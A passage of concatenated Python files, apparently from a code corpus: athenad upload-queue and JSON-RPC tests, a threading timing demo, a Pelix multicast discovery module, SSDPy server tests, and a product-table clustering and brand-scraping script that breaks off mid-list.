item = athenad.UploadItem(path=fn, url="http://localhost:1238", headers={}, created_at=int(time.time()*1000), id='')
with self.assertRaises(requests.exceptions.ConnectionError):
athenad._do_upload(item)
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
resp = athenad._do_upload(item)
self.assertEqual(resp.status_code, 201)
@with_http_server
def test_uploadFileToUrl(self, host):
not_exists_resp = dispatcher["uploadFileToUrl"]("does_not_exist.bz2", "http://localhost:1238", {})
self.assertEqual(not_exists_resp, {'enqueued': 0, 'items': [], 'failed': ['does_not_exist.bz2']})
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
resp = dispatcher["uploadFileToUrl"]("qlog.bz2", f"{host}/qlog.bz2", {})
self.assertEqual(resp['enqueued'], 1)
self.assertNotIn('failed', resp)
self.assertDictContainsSubset({"path": fn, "url": f"{host}/qlog.bz2", "headers": {}}, resp['items'][0])
self.assertIsNotNone(resp['items'][0].get('id'))
self.assertEqual(athenad.upload_queue.qsize(), 1)
@with_http_server
def test_upload_handler(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='', allow_cellular=True)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
athenad.upload_queue.put_nowait(item)
try:
self.wait_for_upload()
time.sleep(0.1)
# TODO: verify that upload actually succeeded
self.assertEqual(athenad.upload_queue.qsize(), 0)
finally:
end_event.set()
@with_http_server
@mock.patch('requests.put')
def test_upload_handler_retry(self, host, mock_put):
for status, retry in ((500, True), (412, False)):
mock_put.return_value.status_code = status
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='', allow_cellular=True)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
athenad.upload_queue.put_nowait(item)
try:
self.wait_for_upload()
time.sleep(0.1)
self.assertEqual(athenad.upload_queue.qsize(), 1 if retry else 0)
finally:
end_event.set()
if retry:
self.assertEqual(athenad.upload_queue.get().retry_count, 1)
def test_upload_handler_timeout(self):
"""When an upload times out or fails to connect it should be placed back in the queue"""
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='', allow_cellular=True)
item_no_retry = item._replace(retry_count=MAX_RETRY_COUNT)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item_no_retry)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload with retry count exceeded is not put back
self.assertEqual(athenad.upload_queue.qsize(), 0)
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
time.sleep(0.1)
# Check that upload item was put back in the queue with incremented retry count
self.assertEqual(athenad.upload_queue.qsize(), 1)
self.assertEqual(athenad.upload_queue.get().retry_count, 1)
finally:
end_event.set()
def test_cancelUpload(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id', allow_cellular=True)
athenad.upload_queue.put_nowait(item)
dispatcher["cancelUpload"](item.id)
self.assertIn(item.id, athenad.cancelled_uploads)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
self.wait_for_upload()
time.sleep(0.1)
self.assertEqual(athenad.upload_queue.qsize(), 0)
self.assertEqual(len(athenad.cancelled_uploads), 0)
finally:
end_event.set()
def test_cancelExpiry(self):
t_future = datetime.now() - timedelta(days=40)
ts = int(t_future.strftime("%s")) * 1000
# Item that would time out if actually uploaded
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url="http://localhost:44444/qlog.bz2", headers={}, created_at=ts, id='', allow_cellular=True)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
time.sleep(0.1)
self.assertEqual(athenad.upload_queue.qsize(), 0)
finally:
end_event.set()
def test_listUploadQueueEmpty(self):
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 0)
@with_http_server
def test_listUploadQueueCurrent(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='', allow_cellular=True)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
athenad.upload_queue.put_nowait(item)
self.wait_for_upload()
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertTrue(items[0]['current'])
finally:
end_event.set()
def test_listUploadQueue(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id', allow_cellular=True)
athenad.upload_queue.put_nowait(item)
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertDictEqual(items[0], item._asdict())
self.assertFalse(items[0]['current'])
athenad.cancelled_uploads.add(item.id)
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 0)
def test_upload_queue_persistence(self):
item1 = athenad.UploadItem(path="_", url="_", headers={}, created_at=int(time.time()), id='id1')
item2 = athenad.UploadItem(path="_", url="_", headers={}, created_at=int(time.time()), id='id2')
athenad.upload_queue.put_nowait(item1)
athenad.upload_queue.put_nowait(item2)
# Ensure cancelled items are not persisted
athenad.cancelled_uploads.add(item2.id)
# serialize item
athenad.UploadQueueCache.cache(athenad.upload_queue)
# deserialize item
athenad.upload_queue.queue.clear()
athenad.UploadQueueCache.initialize(athenad.upload_queue)
self.assertEqual(athenad.upload_queue.qsize(), 1)
self.assertDictEqual(athenad.upload_queue.queue[-1]._asdict(), item1._asdict())
@mock.patch('selfdrive.athena.athenad.create_connection')
def test_startLocalProxy(self, mock_create_connection):
end_event = threading.Event()
ws_recv = queue.Queue()
ws_send = queue.Queue()
mock_ws = MockWebsocket(ws_recv, ws_send)
mock_create_connection.return_value = mock_ws
echo_socket = EchoSocket(self.SOCKET_PORT)
socket_thread = threading.Thread(target=echo_socket.run)
socket_thread.start()
athenad.startLocalProxy(end_event, 'ws://localhost:1234', self.SOCKET_PORT)
ws_recv.put_nowait(b'ping')
try:
recv = ws_send.get(timeout=5)
assert recv == (b'ping', ABNF.OPCODE_BINARY), recv
finally:
# signal websocket close to athenad.ws_proxy_recv
ws_recv.put_nowait(WebSocketConnectionClosedException())
socket_thread.join()
def test_getSshAuthorizedKeys(self):
keys = dispatcher["getSshAuthorizedKeys"]()
self.assertEqual(keys, MockParams().params["GithubSshKeys"].decode('utf-8'))
def test_getVersion(self):
resp = dispatcher["getVersion"]()
keys = ["version", "remote", "branch", "commit"]
self.assertEqual(list(resp.keys()), keys)
for k in keys:
self.assertIsInstance(resp[k], str, f"{k} is not a string")
self.assertTrue(len(resp[k]) > 0, f"{k} has no value")
def test_jsonrpc_handler(self):
end_event = threading.Event()
thread = threading.Thread(target=athenad.jsonrpc_handler, args=(end_event,))
thread.daemon = True
thread.start()
try:
# with params
athenad.recv_queue.put_nowait(json.dumps({"method": "echo", "params": ["hello"], "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 'hello', 'id': 0, 'jsonrpc': '2.0'})
# without params
athenad.recv_queue.put_nowait(json.dumps({"method": "getNetworkType", "jsonrpc": "2.0", "id": 0}))
resp = athenad.send_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': 1, 'id': 0, 'jsonrpc': '2.0'})
# log forwarding
athenad.recv_queue.put_nowait(json.dumps({'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'}))
resp = athenad.log_recv_queue.get(timeout=3)
self.assertDictEqual(json.loads(resp), {'result': {'success': 1}, 'id': 0, 'jsonrpc': '2.0'})
finally:
end_event.set()
thread.join()
def test_get_logs_to_send_sorted(self):
fl = list()
for i in range(10):
fn = os.path.join(swaglog.SWAGLOG_DIR, f'swaglog.{i:010}')
Path(fn).touch()
fl.append(os.path.basename(fn))
# ensure the list is all logs except most recent
sl = athenad.get_logs_to_send_sorted()
self.assertListEqual(sl, fl[:-1])
if __name__ == '__main__':
unittest.main()
|
addTwoTimes.py
|
import threading
import time
def add(r, results=None):
    res = 0
    for i in r:
        res += i
    tid = threading.current_thread().name
    print("Result in {} = {}".format(tid, res))
    if results is not None:
        results.append(res)
    return res
#################################################
# Sequential Processing:
#################################################
t = time.time()
result = add(range(5_000_000)) + add(range(5_000_000))
print("Sequential Processing result: ", result)
print("Sequential Processing took:", time.time() - t, "\n")
#################################################
# Multithreaded Processing:
#################################################
t = time.time()
results = []
# create threads (for CPU-bound work like this the GIL prevents any real speedup)
tr1 = threading.Thread(name="tr1", target=add, args=(range(5_000_000), results))
tr2 = threading.Thread(name="tr2", target=add, args=(range(5_000_000), results))
# start threads
tr1.start(); tr2.start()
# wait for the threads to finish
tr1.join(); tr2.join()
print("Multithreaded Processing result: ", sum(results))
print("Multithreaded Processing took:", time.time() - t, "\n")
|
multicast.py
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Pelix remote services: Multicast discovery and event notification
A discovery packet contains the access to the dispatcher servlet, which
can be used to get the end points descriptions.
An event notification packet contains an end point UID, a kind of event and the
previous service properties (if the event is an update).
**WARNING:** Do not forget to open the UDP ports used for the multicast, even
when using remote services on the local host only.
:author: Thomas Calmant
:copyright: Copyright 2020, Thomas Calmant
:license: Apache License 2.0
:version: 1.0.1
..
Copyright 2020 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import logging
import json
import os
import select
import socket
import struct
import threading
# iPOPO decorators
from pelix.ipopo.decorators import (
ComponentFactory,
Requires,
Provides,
Invalidate,
Validate,
Property,
)
# Pelix utilities
import pelix.constants
from pelix.ipv6utils import ipproto_ipv6
from pelix.utilities import to_bytes, to_str
# Remote services
import pelix.remote
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
if os.name == "nt":
# Windows Specific code
def pton(family, address):
"""
Calls inet_pton
:param family: Socket family
:param address: A string address
:return: The binary form of the given address
"""
if family == socket.AF_INET:
return socket.inet_aton(address)
elif family == socket.AF_INET6:
# Do it using WinSocks
import ctypes
winsock = ctypes.windll.ws2_32
# Prepare structure
class sockaddr_in6(ctypes.Structure):
# pylint: disable=C0103, R0903
"""
Definition of the C structure 'sockaddr_in6'
"""
_fields_ = [
("sin6_family", ctypes.c_short),
("sin6_port", ctypes.c_ushort),
("sin6_flowinfo", ctypes.c_ulong),
("sin6_addr", ctypes.c_ubyte * 16),
("sin6_scope_id", ctypes.c_ulong),
]
# Prepare pointers
addr_ptr = ctypes.c_char_p(to_bytes(address))
out_address = sockaddr_in6()
            size = ctypes.c_int(ctypes.sizeof(sockaddr_in6))  # a C int, so it can be passed by pointer below
size_ptr = ctypes.pointer(size)
# Second call
winsock.WSAStringToAddressA(
addr_ptr, family, 0, out_address, size_ptr
)
# Convert the array...
bin_addr = 0
for part in out_address.sin6_addr:
bin_addr = bin_addr * 16 + part
return bin_addr
else:
raise ValueError("Unhandled socket family: {0}".format(family))
else:
# Other systems
def pton(family, address):
"""
Calls inet_pton
:param family: Socket family
:param address: A string address
:return: The binary form of the given address
"""
return socket.inet_pton(family, address)
# ------------------------------------------------------------------------------
def make_mreq(family, address):
"""
Makes a mreq structure object for the given address and socket family.
:param family: A socket family (AF_INET or AF_INET6)
:param address: A multicast address (group)
:raise ValueError: Invalid family or address
"""
if not address:
raise ValueError("Empty address")
# Convert the address to a binary form
group_bin = pton(family, address)
if family == socket.AF_INET:
# IPv4
# struct ip_mreq
# {
# struct in_addr imr_multiaddr; /* IP multicast address of group */
# struct in_addr imr_interface; /* local IP address of interface */
# };
# "=I" : Native order, standard size unsigned int
return group_bin + struct.pack("=I", socket.INADDR_ANY)
elif family == socket.AF_INET6:
# IPv6
# struct ipv6_mreq {
# struct in6_addr ipv6mr_multiaddr;
# unsigned int ipv6mr_interface;
# };
# "@I" : Native order, native size unsigned int
return group_bin + struct.pack("@I", 0)
raise ValueError("Unknown family {0}".format(family))
# ------------------------------------------------------------------------------
def create_multicast_socket(address, port):
"""
Creates a multicast socket according to the given address and port.
Handles both IPv4 and IPv6 addresses.
:param address: Multicast address/group
:param port: Socket port
:return: A tuple (socket, listening address)
:raise ValueError: Invalid address or port
"""
# Get the information about a datagram (UDP) socket, of any family
try:
addrs_info = socket.getaddrinfo(
address, port, socket.AF_UNSPEC, socket.SOCK_DGRAM
)
except socket.gaierror:
raise ValueError(
"Error retrieving address informations ({0}, {1})".format(
address, port
)
)
if len(addrs_info) > 1:
_logger.debug(
"More than one address information found. Using the first one."
)
# Get the first entry : (family, socktype, proto, canonname, sockaddr)
addr_info = addrs_info[0]
# Only accept IPv4/v6 addresses
if addr_info[0] not in (socket.AF_INET, socket.AF_INET6):
# Unhandled address family
raise ValueError("Unhandled socket family : %d" % (addr_info[0]))
# Prepare the socket
sock = socket.socket(addr_info[0], socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Reuse address
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if hasattr(socket, "SO_REUSEPORT"):
# Special for MacOS
# pylint: disable=E1101
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
# Bind the socket
if sock.family == socket.AF_INET:
# IPv4 binding
sock.bind(("0.0.0.0", port))
else:
# IPv6 Binding
sock.bind(("::", port))
# Prepare the mreq structure to join the group
# addrinfo[4] = (addr,port)
mreq = make_mreq(sock.family, addr_info[4][0])
# Join the group
if sock.family == socket.AF_INET:
# IPv4
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
# Allow multicast packets to get back on this host
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
elif sock.family == socket.AF_INET6:
# IPv6
sock.setsockopt(ipproto_ipv6(), socket.IPV6_JOIN_GROUP, mreq)
# Allow multicast packets to get back on this host
sock.setsockopt(ipproto_ipv6(), socket.IPV6_MULTICAST_LOOP, 1)
return sock, addr_info[4][0]
def close_multicast_socket(sock, address):
"""
Cleans up the given multicast socket.
Unregisters it of the multicast group.
Parameters should be the result of create_multicast_socket
:param sock: A multicast socket
:param address: The multicast address used by the socket
"""
if sock is None:
return
if address:
# Prepare the mreq structure to join the group
mreq = make_mreq(sock.family, address)
# Quit group
if sock.family == socket.AF_INET:
# IPv4
sock.setsockopt(socket.IPPROTO_IP, socket.IP_DROP_MEMBERSHIP, mreq)
elif sock.family == socket.AF_INET6:
# IPv6
sock.setsockopt(ipproto_ipv6(), socket.IPV6_LEAVE_GROUP, mreq)
# Close the socket
sock.close()
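# Example (not part of the original module): typical use of the two helpers above,
# joining an assumed test group 239.0.0.1:42000, exchanging one datagram and
# leaving the group again.
#
#   sock, group_address = create_multicast_socket("239.0.0.1", 42000)
#   try:
#       sock.sendto(b"hello", 0, (group_address, 42000))
#       data, sender = sock.recvfrom(1024)
#   finally:
#       close_multicast_socket(sock, group_address)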
# ------------------------------------------------------------------------------
@ComponentFactory(pelix.remote.FACTORY_DISCOVERY_MULTICAST)
@Provides(pelix.remote.SERVICE_EXPORT_ENDPOINT_LISTENER)
@Requires("_access", pelix.remote.SERVICE_DISPATCHER_SERVLET)
@Requires("_registry", pelix.remote.SERVICE_REGISTRY)
@Property("_group", "multicast.group", "239.0.0.1")
@Property("_port", "multicast.port", 42000)
class MulticastDiscovery(object):
"""
Remote services discovery and notification using multicast packets
"""
def __init__(self):
"""
Sets up the component
"""
# End points registry
self._registry = None
# Dispatcher access
self._access = None
# Framework UID
self._fw_uid = None
# Socket
self._group = "239.0.0.1"
self._port = 42000
self._socket = None
self._target = None
# Reception loop
self._stop_event = threading.Event()
self._thread = None
def __make_basic_dict(self, event):
"""
Prepares basic common information contained into an event packet
(access, framework UID, event type)
:param event: The kind of event
:return: A dictionary
"""
# Get the dispatcher servlet access
access = self._access.get_access()
# Make the event packet content
return {
"sender": self._fw_uid,
"event": event, # Kind of event
"access": {
"port": access[0], # Access to the dispatcher
"path": access[1],
},
} # servlet
def _make_endpoint_dict(self, event, endpoint):
"""
Prepares an event packet containing a single endpoint
:param event: The kind of event (update, remove)
:param endpoint: An ExportEndpoint bean
:return: A dictionary
"""
# Basic packet information
packet = self.__make_basic_dict(event)
# Add endpoint information
packet["uid"] = endpoint.uid
if event == "update":
# Give the new end point properties
packet["new_properties"] = endpoint.make_import_properties()
return packet
def _make_endpoints_dict(self, event, endpoints):
"""
Prepares an event packet containing multiple endpoints
:param event: The kind of event (add)
:param endpoints: A list of ExportEndpoint beans
:return: A dictionary
"""
# Basic packet information
packet = self.__make_basic_dict(event)
# Add endpoints information
packet["uids"] = [endpoint.uid for endpoint in endpoints]
return packet
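    # Illustrative packet shapes built by the helpers above (values hypothetical):
    #   discovery: {"sender": "<fw-uid>", "event": "discovery",
    #               "access": {"port": 8080, "path": "/pelix-dispatcher"}}
    #   add:       the same basic fields plus "uids": ["<endpoint-uid>", ...]
    #   update:    the same basic fields plus "uid": "<endpoint-uid>" and
    #              "new_properties": {...}
    #   remove:    the same basic fields plus "uid": "<endpoint-uid>"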
def __send_packet(self, data, target=None):
"""
Sends a UDP datagram to the given target, if given, or to the multicast
group.
:param data: The content of the datagram
:param target: The packet target (can be None)
"""
if target is None:
# Use the multicast target by default
target = self._target
# Converts data to bytes
data = to_bytes(data)
# Send the data
self._socket.sendto(data, 0, target)
def _send_discovery(self):
"""
Sends a discovery packet, requesting others to indicate their services
"""
# Send a JSON request
data = json.dumps(self.__make_basic_dict("discovery"))
self.__send_packet(data)
def endpoints_added(self, endpoints):
"""
Multiple endpoints have been created
"""
# Send a JSON event
data = json.dumps(self._make_endpoints_dict("add", endpoints))
self.__send_packet(data)
def endpoint_updated(self, endpoint, old_properties):
# pylint: disable=W0613
"""
An end point is updated
"""
# Send a JSON event
data = json.dumps(self._make_endpoint_dict("update", endpoint))
self.__send_packet(data)
def endpoint_removed(self, endpoint):
"""
An end point is removed
"""
# Send a JSON event
data = json.dumps(self._make_endpoint_dict("remove", endpoint))
self.__send_packet(data)
def _handle_packet(self, sender, raw_data):
"""
Calls the method associated to the kind of event indicated in the given
packet.
:param sender: The (address, port) tuple of the client
:param raw_data: Raw packet content
"""
# Decode content
data = json.loads(raw_data)
# Avoid handling our own packets
sender_uid = data["sender"]
if sender_uid == self._fw_uid:
return
# Dispatch the event
event = data["event"]
if event == "discovery":
# Discovery request
access = data["access"]
self._access.send_discovered(
sender[0], access["port"], access["path"]
)
elif event in ("add", "update", "remove"):
# End point event
self._handle_event_packet(sender, data)
else:
_logger.warning("Unknown event '%s' from %s", event, sender)
def _handle_event_packet(self, sender, data):
"""
Handles an end point event packet
:param sender: The (address, port) tuple of the client
:param data: Decoded packet content
"""
# Get the event
event = data["event"]
if event == "add":
# Store it
port = data["access"]["port"]
path = data["access"]["path"]
for uid in data["uids"]:
# Get the description of the endpoint
endpoint = self._access.grab_endpoint(
sender[0], port, path, uid
)
if endpoint is not None:
# Register the endpoint
self._registry.add(endpoint)
elif event == "remove":
# Remove it
self._registry.remove(data["uid"])
elif event == "update":
# Update it
endpoint_uid = data["uid"]
new_properties = data["new_properties"]
self._registry.update(endpoint_uid, new_properties)
def _read_loop(self):
"""
Reads packets from the socket
"""
while not self._stop_event.is_set():
# Watch for content
ready = select.select([self._socket], [], [], 1)
if ready[0]:
# Socket is ready
data, sender = self._socket.recvfrom(1024)
try:
data = to_str(data)
self._handle_packet(sender, data)
except Exception as ex:
_logger.exception("Error handling the packet: %s", ex)
@Invalidate
def invalidate(self, _):
"""
Component invalidated
"""
# Stop the loop
self._stop_event.set()
# Join the thread
self._thread.join()
# Close the socket
close_multicast_socket(self._socket, self._target[0])
# Clean up
self._thread = None
self._socket = None
self._target = None
self._fw_uid = None
_logger.debug("Multicast discovery invalidated")
@Validate
def validate(self, context):
"""
Component validated
"""
# Ensure we have a valid port
self._port = int(self._port)
# Get the framework UID
self._fw_uid = context.get_property(pelix.constants.FRAMEWORK_UID)
# Create the socket
self._socket, address = create_multicast_socket(self._group, self._port)
# Store group access information
self._target = (address, self._port)
# Start the listening thread
self._stop_event.clear()
self._thread = threading.Thread(target=self._read_loop)
self._thread.start()
# Send a discovery request
self._send_discovery()
_logger.debug(
"Multicast discovery validated: group=%s port=%d",
self._group,
self._port,
)
|
test_server.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import threading
import time
import pytest
import os
from ssdpy import SSDPServer
def test_server_ipv4():
server = SSDPServer("test-server", proto="ipv4")
server.sock.settimeout(5)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
time.sleep(0.5)
server.stopped = True
server_thread.join()
@pytest.mark.skipif(
os.environ.get("TRAVIS") == "true",
reason="IPv6 testing is broken in Travis-CI, see https://github.com/travis-ci/travis-ci/issues/8361",
)
def test_server_ipv6():
server = SSDPServer("test-server-ipv6", proto="ipv6")
server.sock.settimeout(5)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
time.sleep(0.5)
server.stopped = True
server_thread.join()
|
Entity_Product_Clean cluster tables & Allocation.py
|
### This Python script performs the keyword search in several steps, allocates the remaining rows to the specified domains and performs a post-processing step based on manually selected similarity thresholds. ###
import pandas as pd
import os
import progressbar
from urllib.request import urlopen, Request
from bs4 import BeautifulSoup
import json
import logging
import threading
import time
from nltk.corpus import stopwords
import string
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from nltk.tokenize import word_tokenize
def thread_function(name):
logging.info("Thread %s: starting", name)
time.sleep(2)
logging.info("Thread %s: finishing", name)
"""
session = None
def set_global_session():
global session
if not session:
session = requests.Session()
def download_site(url):
with session.get(url) as response:
name = multiprocessing.current_process().name
print(f"{name}:Read {len(response.content)} from {url}")
def download_all_sites(sites):
with multiprocessing.Pool(initializer=set_global_session) as pool:
pool.map(download_site, sites)
"""
path_parent = os.path.dirname(os.getcwd())
product_path = os.path.join(path_parent, 'src/data/product')
cleaned_top100_path = os.path.join(product_path, 'product_top100/cleaned')
cleaned_min3_path = os.path.join(product_path, 'product_minimum3/cleaned')
cluster_path = os.path.join(product_path, 'lspc2020_to_tablecorpus/Cleaned')
notebook_path = os.path.join(path_parent, 'notebooks')
def clean_clusters():
"""
iterate through all cluster_files;
clean them by using only valid top100 and min3 files after language detection;
    count how many tables include a certain product
:return:
"""
# list all valid files after language detection
data_files = [file for file in os.listdir(cleaned_min3_path) if file.endswith('.json.gz')]
data_files += [file for file in os.listdir(cleaned_top100_path) if file.endswith('.json.gz')]
cluster_files = [file for file in os.listdir(cluster_path) if file.endswith('.json.gz')]
# generate dictionaries with different information to track product allocation
allocation_with_table_ids_total_dict = {}
allocation_with_table_ids_set_dict = {}
allocation_amount_only_total_dict = {}
allocation_amount_only_set_dict = {}
unique_cluster_ids = []
count_files = 0
for cluster_file in cluster_files:
print(cluster_file)
df = pd.read_json(os.path.join(cluster_path, '{}'.format(cluster_file)), compression='gzip', lines=True)
# design new dataframe with valid tables only
df_cleaned = df[df['table_id'].isin(data_files)]
df_cleaned = df_cleaned.reset_index()
df_cleaned = df_cleaned.drop('index', axis=1)
# generate a unique list of cluster IDs
cluster_ids = df_cleaned['cluster_id'].tolist()
if unique_cluster_ids == []:
new_cluster_ids = list(set(cluster_ids))
else:
new_cluster_ids = list(set(cluster_ids) - set(unique_cluster_ids))
unique_cluster_ids += new_cluster_ids
unique_cluster_ids = list(set(unique_cluster_ids))
# add dictionary keys
new_cluster_ids_tables_dict = {key: [] for key in new_cluster_ids}
new_cluster_ids_amount_dict = {key: 0 for key in new_cluster_ids}
allocation_with_table_ids_total_dict.update(new_cluster_ids_tables_dict)
allocation_with_table_ids_set_dict.update(new_cluster_ids_tables_dict)
allocation_amount_only_total_dict.update(new_cluster_ids_amount_dict)
allocation_amount_only_set_dict.update(new_cluster_ids_amount_dict)
count = 0
with progressbar.ProgressBar(max_value=df_cleaned.shape[0]) as bar:
for i in range(df_cleaned.shape[0]): # iterate over rows
cluster_id = df_cleaned['cluster_id'][i]
table_id = df_cleaned['table_id'][i]
allocation_with_table_ids_total_dict[cluster_id].append(table_id) # write every table_id inside
allocation_amount_only_total_dict[cluster_id] += 1 # increment for every table_id
allocation_with_table_ids_set_dict[cluster_id] = list(
set(allocation_with_table_ids_total_dict[cluster_id])) # write only unique table_ids inside
allocation_amount_only_set_dict[cluster_id] = len(
allocation_with_table_ids_set_dict[cluster_id]) # increment only for unique table_ids
count += 1
bar.update(count)
count_files += 1
print('{} out of {} cluster files done'.format(count_files, len(cluster_files)))
# write to gzip compressed json file
df_cleaned.to_json(os.path.join(cluster_path, '{}'.format(cluster_file)), compression='gzip', orient='records',
lines=True)
# save dictionaries with allocation of products
with open(os.path.join(cluster_path, 'allocation_with_table_ids_total_dict.json'), 'w', encoding='utf-8') as f:
json.dump(allocation_with_table_ids_total_dict, f)
with open(os.path.join(cluster_path, 'allocation_with_table_ids_set_dict.json'), 'w', encoding='utf-8') as f:
json.dump(allocation_with_table_ids_set_dict, f)
with open(os.path.join(cluster_path, 'allocation_amount_only_total_dict.json'), 'w', encoding='utf-8') as f:
json.dump(allocation_amount_only_total_dict, f)
with open(os.path.join(cluster_path, 'allocation_amount_only_set_dict.json'), 'w', encoding='utf-8') as f:
json.dump(allocation_amount_only_set_dict, f)
def get_keywords():
"""
finds all important brands for clothes and electronics
:return: dictionary {'clothes' : [clothes_brand1, clothes_brand2, ...],
'electronics' : [electronics_brand1, electronics_brand2, ...]}
"""
print('get keywords')
# search for clothes brands top100
clothes_html = urlopen('https://fashionunited.com/i/most-valuable-fashion-brands/')
clothes_bsObj = BeautifulSoup(clothes_html.read(), 'lxml')
clothes_table = clothes_bsObj.find('table')
clothes_lines = clothes_table.find('tbody').find_all('tr')
clothes_list = []
for clothes_line in clothes_lines:
clothes_brand = clothes_line.get_text().split('\n')[2].lower()
clothes_list.append(clothes_brand)
# search for top electronic brands
req = Request('https://companiesmarketcap.com/electronics/largest-electronic-manufacturing-by-market-cap/',
headers={'User-Agent': 'Mozilla/5.0'})
electronics_html = urlopen(req)
electronics_bsObj = BeautifulSoup(electronics_html.read(), 'lxml')
electronics_lines = electronics_bsObj.find_all('tr')
electronics_list = []
for electronics_line in electronics_lines:
electronics_brand_info = electronics_line.find('a')
if electronics_brand_info != None:
electronics_brand = electronics_brand_info.find('div').get_text().split('\r')[0].lower()
electronics_list.append(electronics_brand)
# second page
electronics_list2 = ['intel', 'taiwan semiconductor manufacturing', 'samsung electronics',
'hon hai precision industry',
'hitachi', 'sony', 'panasonic', 'lg electronics', 'pegatron', 'mitsubishi electric',
'midea group',
'honeywell international', 'apple', 'dell technologies', 'hp', 'lenovo', 'quanta computer',
'canon',
                         'compal electronics', 'hewlett packard enterprise']
# only top 10
clothes_top10 = []
brands_dict = {'clothes': clothes_list, 'electronics1': electronics_list, 'electronics2': electronics_list2,
'electronics_total': list(set(electronics_list + electronics_list2))}
with open(os.path.join(product_path, 'brands_dict.json'), 'w', encoding='utf-8') as f:
json.dump(brands_dict, f)
print('getting keywords done')
return brands_dict
def get_new_keywords():
print('get keywords')
with open(os.path.join(product_path, 'brands_dict.json'), 'r', encoding='utf-8') as f:
brands_dict = json.load(f)
"""
# for bikes
bikes_html = urlopen('https://bikesreviewed.com/brands/')
bikes_bsObj = BeautifulSoup(bikes_html.read(), 'lxml')
bikes_lines = bikes_bsObj.find_all('h3')
bikes_list = []
for bikes_line in bikes_lines:
if len(bikes_line.get_text().split('. ')) > 1:
bikes_brand = bikes_line.get_text().split('. ')[1].lower()
else:
bikes_brand = bikes_line.get_text().lower()
bikes_list.append(bikes_brand)
bikes_list.append('nonch')
bikes2_html = urlopen('https://www.globalbrandsmagazine.com/top-bicycle-brands-in-the-world-2020/')
bikes2_bsObj = BeautifulSoup(bikes2_html.read(), 'lxml')
bikes2_lines = bikes2_bsObj.find_all('h3')
for bikes2_line in bikes2_lines:
bikes2_brand = bikes2_line.find('a').get_text().lower()
bikes_list.append(bikes2_brand)
bikes_list = [element.split('\u00a0')[1] if element.startswith('\u00a0') else element for element in bikes_list]
bikes_list = [element for element in bikes_list if element not in [
' 8 thoughts on “the best bike brands for 2021 – the top 60 road, mountain, hybrid and bmx bike manufacturers ranked”',
'lifestyle', '11. huffy bikes', 'leave a reply cancel reply', 'all-around brands', 'hybrid', 'road ']]
bikes_list.append('huffy bikes')
# removed giant, electric, folding manually
bikes_list = list(set(bikes_list))
brands_dict['bikes'] = bikes_list
# for drugstore
brands_dict['drugstore'] = ['avène', 'dove', 'jergens', 'mele', 'vichy', 'e.l.f.', 'bevel', 'eucerin', 'acnefree',
